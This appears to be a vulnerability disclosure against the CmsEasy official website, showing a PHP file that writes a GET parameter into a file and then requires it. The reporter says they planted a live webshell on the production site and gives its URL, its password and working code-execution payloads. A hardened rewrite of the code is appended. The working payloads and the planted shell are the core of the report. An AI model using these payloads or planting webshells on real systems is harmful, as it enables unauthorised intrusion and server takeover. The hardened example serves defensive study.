### Brief description:

CMS official website: unconditional getshell. Hoping this goes through the major-vendor process; requesting 20 rank.

### Detailed description:

First, take a look at the webshell, otherwise my webshell will simply get overwritten.

Chopper address: http://www.cmseasy.cn/post/list.php?list=@eval%28$_POST[%27a%27]%29;

Password: a

![22222222222222222222222.png](https://images.seebug.org/upload/201511/022141252ffb7b421ea03d440417e9de5e06ce48.png)

### Proof of vulnerability:

view-source:http://www.cmseasy.cn/post/list.php?list=echo%20file_get_contents(%27list.php%27);

```
<?php
/*
 *
 * Article list generation file
 */
if (isset($_GET['list'])) {
    mud();
}
function mud() {
    $fp = fopen('content_batch_stye.html', 'w');
    file_put_contents('content_batch_stye.html', "<?php\r\n");
    file_put_contents('content_batch_stye.html', $_GET['list'], FILE_APPEND);
    fclose($fp);
    require 'content_batch_stye.html';
}
?>
```

```
http://www.cmseasy.cn/post/list.php?list=phpinfo();
```

![QQ20151103-1@2x.png](https://images.seebug.org/upload/201511/031534127d2d7c95b3ac3372613acfbc020c4dee.png)
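Added example (not part of the original report and not CmsEasy's code): a hardened form of the `list.php` logic above, in which the request value is validated, stored as data, and read back without ever reaching `require`. The numeric-id format assumed for `list`, the function names `store_list` and `render_list`, and the file name are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hardened sketch of the list.php logic (added example, not CmsEasy code).
// Assumption: `list` carries comma-separated numeric article ids.

function store_list(string $raw, string $path): bool
{
    // Allow-list validation: 1 to 100 ids of up to 10 digits each.
    // Anything else (quotes, parentheses, semicolons, tags) is refused.
    if (preg_match('/\A\d{1,10}(?:,\d{1,10}){0,99}\z/', $raw) !== 1) {
        return false;
    }
    // Written as plain data under an exclusive lock; no PHP open tag
    // is prepended, and the file has a non-executable extension.
    return file_put_contents($path, $raw, LOCK_EX) !== false;
}

function render_list(string $path): string
{
    // file_get_contents() returns bytes; unlike require, it never
    // hands the file to the PHP interpreter.
    $data = is_file($path) ? (string) file_get_contents($path) : '';
    // Encode on output so stored data cannot become markup either.
    return htmlspecialchars($data, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs: one well-formed id list and one value shaped like
// the payloads in the report. In a web handler the value would come from
// $_GET['list'] after an is_string() check.
$path = sys_get_temp_dir() . '/content_batch_style.txt'; // hypothetical path
foreach (['12,15,20', 'phpinfo();'] as $input) {
    $ok = store_list($input, $path);
    printf("%-12s => %s\n", $input, $ok ? 'stored: ' . render_list($path) : 'rejected');
}
```

In a deployment the data file would also sit outside the web root, and the write path would require an authenticated session rather than an anonymous GET request.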